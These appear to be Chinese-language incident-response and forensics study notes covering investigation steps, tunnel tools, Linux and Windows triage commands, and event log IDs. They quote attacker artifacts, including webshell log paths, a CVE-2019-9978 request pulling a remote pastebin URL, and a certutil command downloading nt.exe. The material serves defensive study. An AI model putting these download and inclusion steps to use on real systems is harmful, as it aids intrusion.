* CyberLab-貓味，你坐阿 5/5 * 準備(網路拓樸(網段)，設備類別/用途)，-->偵測&分析-->移除&復原-->後續檢討 * 調查思路 * 人(誰被攻擊，確認攻擊者來源) * 事(確認事件的類別，過去是否有發生過) * 時(確認攻擊的時間點) * 地(確認發生的網段、誰可以存取、平時如何管理) * 物(確認有什麼東西產生了、確認外洩什麼東西) * 事件象限圖(1-7分數) * 防禦 * Log * Memory * Networking * HDD * Reversing * 攻擊 * Enumeration * Real-Life * CVE * Custom Exploitation * CTF-Life * 鑑識 Forensic * History & Log * Shell history * Web access log * Eventlog * Process * Services * Connection * File * App(binary,script) * Autoruns * Config 範例1: apache/nginx access log /admine21_decode.php /s.php /npv/xxxx /admin-post.php?swp_url=https://pastbin.com/raw/aaaa * 常見Tunnel工具 * TCP * earthworn * termite * SSocks * tunna * Netcat * LCX * SSH * HTTP tunnel * Regeorg * frp * ngrok * Linux forensic * ps -ef * ls /proc * strace -f -p pid * lsof -i:port * lsof -p pid * crontab -e * cat /etc/rc.local * ls /etc/init.d * ls /etc/profile.d * ls /vat/log/cron* * ls /var/log/secure* * 幾個容易入侵的點 * wordpress的CVE弱點 CVE-2019-9978 RCE * 遭上傳webshell Hacktool VPN * 重點是駭客的橫向軌跡 * S.php * admine21_decode.php * nt.exe ... * Windows forensic * History & Log * web access (IIS LOG) * Eventlog (4688,sysmon) * Process * services * connection * File * App (binary,script) * autotruns * config * Executing History * shimcache (讀取存儲在Windows註冊表中的應用程序兼容性Shim緩存。在Windows系統上執行的文件的元數據放置在正在運行的系統上的此數據結構內) * File Full Path * File Size * $Standard_Information (SI) Last Modified time * Shimcache Last Updated time * Process Execution Flag * Amcache (The Amcache.hve file is a registry file that stores the information of executed applications.) * Eventlog * IIS log * 4688 eventID * powershell w3wp.exe(駭客利用預設提權的w3wp.exe去powershell底下執行 惡意dll載入 * * IIS MDMP 記憶體 * certutil -urlcache -split -f http://192.168.1.2/nt.exe nt.exe * 漏洞利用 ->webshell hooktool password * nt.exe Bbb.aspx SQLDmpr0001.mdmp * Bt.exe testbbbb.aspx SQLDuMPER_ERRORLOG 123.txt test.aspx * Eventlog 類別 * 4688: process created * 4624: logged on * 4625: failed on * 4648: a logon was attempred using explicit credentials * 5156: allow a connection * 1102: los was cleared * 4720: create users * 4722: users account enable * 4742: reset password * 4732: add local group * system 類別 * 7009: servives error * 7045:service start * 7031: services interrput * 7036:services chages status * 7032:serices start error * 7034:serices interrputs many times * Powershell 類別 * 400 * 403 * 4104: script block logging *